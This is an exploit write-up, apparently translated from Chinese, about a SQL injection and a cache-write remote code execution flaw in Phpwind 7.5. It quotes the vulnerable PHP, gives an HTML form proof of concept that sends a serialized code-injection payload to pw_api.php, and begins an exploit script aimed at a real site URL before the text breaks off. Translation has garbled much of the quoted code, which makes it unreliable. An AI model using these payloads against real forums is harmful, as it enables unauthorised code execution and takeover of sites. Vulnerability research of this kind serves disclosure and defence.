Phpwind injection and exploitation: Remote Code Execution

It's all last year's stuff. Drag and Drop. It's today's February, just...

The following are some points:

1. Although pw filtering is very BT, inject more than this point;
2. Get the key db_siteownerid of the system using injection, and get a lot of help from shell, including code execution and the upload to be published below;
3. When I checked the original pw7.5 last year, that is, saiy did not release the Vulnerability. (So it is clear that this vulnerability should have been discovered by saiy ...)

Well, let's talk about injection first. It's obviously an idiotic point. It looks much better than code execution. It's estimated that many people will know it, and it exists in many versions, if it is not strictly filtered, you can update any table in the sp3 version of pw7.5.

Check the Code:

...
} elseif ($action == pcdelimg) {
    InitGP(array(fieldname,pctype));
    InitGP(array(tid,id),2);
    if (!$tid || !$id || !$fieldname || !$pctype) {
        echo fail;
    }
    $id = (int)$id;
    if ($pctype == topic) {
        $tablename = GetTopcitable($id);
    } elseif ($pctype == postcate) {
        $tablename = GetPcatetable($id);
    }

    $path = $db->get_value("SELECT $fieldname FROM $tablename WHERE tid=". pwEscape($tid));

    if (strpos($path,..) !== false) {
        return false;
    }
    $lastpos = strrpos($path,/) + 1;
    $s_path = substr($path, 0, $lastpos) . s_ . substr($path, $lastpos);

    if (!file_exists("$attachpath/$path")) {
        if (pwFtpNew($ftp,$db_ifftp)) {
            $ftp->delete($path);
            $ftp->delete($s_path);
            pwFtpClose($ftp);
        }
    } else {
        P_unlink("$attachdir/$path");
        if (file_exists("$attachdir/$s_path")) {
            P_unlink("$attachdir/$s_path");
        }
    }

    $db->update("UPDATE $tablename SET $fieldname= WHERE tid=". pwEscape($tid));

    echo success;

    ajax_footer();
} 
...

Just bring it in directly, and we are anxious to die (Alibaba's children)... I wrote exp for db_siteownerid and administrator user password respectively, but the injection method is different from that in wooyun.

Next we will talk about remote code execution. pw writes the cache as a whole. A function pw_var_export can be used all over the world, making it almost impossible for you. However, when writing cache in uc applications, the key is a little careless, so $ class [cid] is directly brought in:

...
Function threadscateGory ($ classdb) {// generates a post exchange category

$ Classcache ="<? Phprn $ info_class= Array (Rn";

Foreach ($ classdb as $ key => $ class ){

! $ Class [ifshow] & $ class [ifshow] = 0;
$ Flag & $ info_class [$ class [cid] [ifshow] & $ class [ifshow] = 1;

$ Class [name] = str_replace (array ("," "), array ("&Quot;","&#39; "), $ class [name]);
$ Classcache. ="$ Class [cid] =>".Pw_var_export($ Class).",";
}
$ Classcache. =");?> ";
Writeover(D_P."Data/bbscache/info_class.php",$ Classcache);
}
...

Therefore, you can directly write executable scripts into the cache and generate shell in data/bbscache/info_class.php! No suspense!

Post the poc when db_siteid is not required in the current year:

<Form method = "post" action = "http: // 127.0.0.1/phpwind/pw_api.php" enctype = "multipart/form-data">
Text: <input type = "text" name = "type" value = "uc" size = "80"/> <br>
Text: <input type = "text" name = "mode" value = "Other" size = "80"/> <br>
Text: <input type = "text" name = "method" value = "threadscateGory" size = "80"/> <br>
Text: <textarea name = "params"> a: 1: {s: 4: "cid"; a: 1: {s: 4: "cid"; a: 1: {s: 3: "cid"; s: 16: "1); phpinfo ();/*" ;}}</textarea> <br>
Text: <input type = "text" name = "sig" value = "7a7f6173632485b4c3e6d3671da683a3" size = "80"/> <br>
<Input type = "submit" name = "submit" value = "submit" class = "submit"/> </td>
</Form>

Paste another modified version:

Put it in the web directory where php can be executed for access. If it is an old version that does not require siteownerid, submit the parameter type = uc; otherwise, you only need to modify $ db_siteownerid...

<?php
$pwurl=http://www.oldjun.com/phpwind;
$db_siteownerid